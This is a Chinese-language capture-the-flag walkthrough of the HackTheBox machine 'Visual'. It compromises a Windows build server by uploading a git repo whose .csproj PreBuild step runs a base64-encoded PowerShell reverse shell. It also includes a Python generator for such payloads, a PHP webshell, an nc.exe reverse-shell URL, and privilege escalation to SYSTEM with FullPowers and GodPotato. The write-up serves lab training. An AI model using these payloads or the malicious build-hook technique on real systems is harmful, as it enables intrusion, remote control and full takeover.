Scan
┌──(kali㉿kali)-[~/Desktop/htb/visual]
└─$ sudo nmap -sT -sV -O -p80 10.10.11.234
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-07 10:44 EDT
Nmap scan report for 10.10.11.234
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: broadband router|specialized|router
Running (JUST GUESSING): OneAccess embedded (88%), AVtech embedded (85%), HP embedded (85%)
OS CPE: cpe:/h:oneaccess:1641 cpe:/h:hp:procurve_7102dl
Aggressive OS guesses: OneAccess 1641 router (88%), AVtech Room Alert 26W environmental monitor (85%), HP ProCurve Secure Router 7102dl (85%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.00 seconds
Web Enumeration
我们可以上传我们的git repo在这,他会自己编译生成exe和dll
制作一个项目:
mkdir G9dotnet new console -n G9 -f net6.0dotnet new sln -n G9dotnet sln G9.sln add G9/G9.csprojgit initgit add .git commit -m "update"#git config user.email "[email protected]"#git config user.name "G9"git update-server-infols -la
具体流程:
┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# mkdir G9┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# dotnet new console -n G9 -f net6.0Welcome to .NET 6.0!---------------------SDK Version: 6.0.400----------------Installed an ASP.NET Core HTTPS development certificate.To trust the certificate run 'dotnet dev-certs https --trust' (Windows and macOS only).Learn about HTTPS: https://aka.ms/dotnet-https----------------Write your first app: https://aka.ms/dotnet-hello-worldFind out what's new: https://aka.ms/dotnet-whats-newExplore documentation: https://aka.ms/dotnet-docsReport issues and find source on GitHub: https://github.com/dotnet/coreUse 'dotnet --help' to see available commands or visit: https://aka.ms/dotnet-cli--------------------------------------------------------------------------------------The template "Console App" was created successfully.Processing post-creation actions...Running 'dotnet restore' on /home/kali/Desktop/htb/visual/G9/G9.csproj...Determining projects to restore...Restored /home/kali/Desktop/htb/visual/G9/G9.csproj (in 9.92 sec).Restore succeeded.┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# dotnet new sln -n G9The template "Solution File" was created successfully.┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# dotnet sln G9.sln add G9/G9.csprojProject `G9/G9.csproj` added to the solution.┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# lsG9 G9.sln┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git inithint: Using 'master' as the name for the initial branch. This default branch namehint: is subject to change. To configure the initial branch name to use in allhint: of your new repositories, which will suppress this warning, call:hint:hint: git config --global init.defaultBranch <name>hint:hint: Names commonly chosen instead of 'master' are 'main', 'trunk' andhint: 'development'. The just-created branch can be renamed via this command:hint:hint: git branch -m <name>Initialized empty Git repository in /home/kali/Desktop/htb/visual/.git/┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git add .┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git commit -m "update"Author identity unknown*** Please tell me who you are.Rungit config --global user.email "[email protected]"git config --global user.name "Your Name"to set your account's default identity.Omit --global to set the identity only in this repository.fatal: unable to auto-detect email address (got 'root@kali.(none)')┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git config user.email "[email protected]"┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git config user.name "G9"┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git commit -m "update"[master (root-commit) 6c69c12] update8 files changed, 218 insertions(+)create mode 100644 G9.slncreate mode 100644 G9/G9.csprojcreate mode 100644 G9/Program.cscreate mode 100644 G9/obj/G9.csproj.nuget.dgspec.jsoncreate mode 100644 G9/obj/G9.csproj.nuget.g.propscreate mode 100644 G9/obj/G9.csproj.nuget.g.targetscreate mode 100644 G9/obj/project.assets.jsoncreate mode 100644 G9/obj/project.nuget.cache┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git update-server-info┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# ls -latotal 20drwxr-xr-x 4 kali kali 4096 Oct 7 09:35 .drwxr-xr-x 10 kali kali 4096 Oct 5 09:11 ..drwxr-xr-x 3 root root 4096 Oct 7 09:35 G9-rw-r--r-- 1 root root 983 Oct 7 09:35 G9.slndrwxr-xr-x 8 root root 4096 Oct 7 09:37 .git┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git add G9/G9.csproj┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git commit -m "csproj update"[master fd7e8db] csproj update1 file changed, 5 insertions(+)┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─# git update-server-info
本地起python服务,然后submit
Gaining access
至此,我们可以利用csproj写入反弹shell
┌──(kali㉿kali)-[~/Desktop/htb/visual/G9]└─$ cat G9.csproj<Project Sdk="Microsoft.NET.Sdk"><PropertyGroup><OutputType>Exe</OutputType><TargetFramework>net6.0</TargetFramework><ImplicitUsings>enable</ImplicitUsings><Nullable>enable</Nullable></PropertyGroup><Target Name="PreBuild" BeforeTargets="BeforeBuild"><Exec Command="powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" /></Target></Project>
ps:这里贴一个生成反弹shell的脚本,或者这里用什么其它工具也行,如下图
https://www.revshells.com/ 可以在此制作revshell
#!/usr/bin/env python3## generate reverse powershell cmdline with base64 encoded args#import sysimport base64def help():print("USAGE: %s IP PORT" % sys.argv[0])print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")exit()try:(ip, port) = (sys.argv[1], int(sys.argv[2]))except:help()# payload from Nikhil Mittal @samratashok# https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'payload = payload % (ip, port)cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()print(cmdline)
修改完G9.csproj执行:
git add G9/G9.csprojgit commit -m "csproj update"git update-server-info
一切就绪submit即可拿shell。
Lateral Movement to nt authoritylocal service
经过翻找,找到如下目录,写入webshell,可以拿到service账户反弹shell
<?php system($_GET['cmd']);?>
http://10.10.11.234/G9.php?cmd=.nc.exe%2010.10.14.44%209001%20-e%20cmd
Privilege escalation
由于该用户是本地服务,我们可以恢复该账户的默认权限。
FullPowers:This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
(这里使用之前的py脚本生成的powershell反弹shell无法恢复权限成功,需要使用nc反弹的shell才可以使用成功)
https://github.com/itm4n/FullPowers
发现有
权限
最后简单地使用GodPotato获得nt权限系统
https://github.com/BeichenDream/GodPotato
┌──(root㉿kali)-[/home/kali/Desktop/htb/visual]└─listening on [any] 9002 ...connect to [10.10.14.44] from (UNKNOWN) [10.10.11.234] 50013idMicrosoft Windows [Version 10.0.17763.4840](c) 2018 Microsoft Corporation. All rights reserved.C:userspublicdocuments>id'id' is not recognized as an internal or external command,operable program or batch file.C:userspublicdocuments>whoamiwhoamint authoritysystem
原文始发于微信公众号(搁浅安全):HTB-Visual(Medium)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论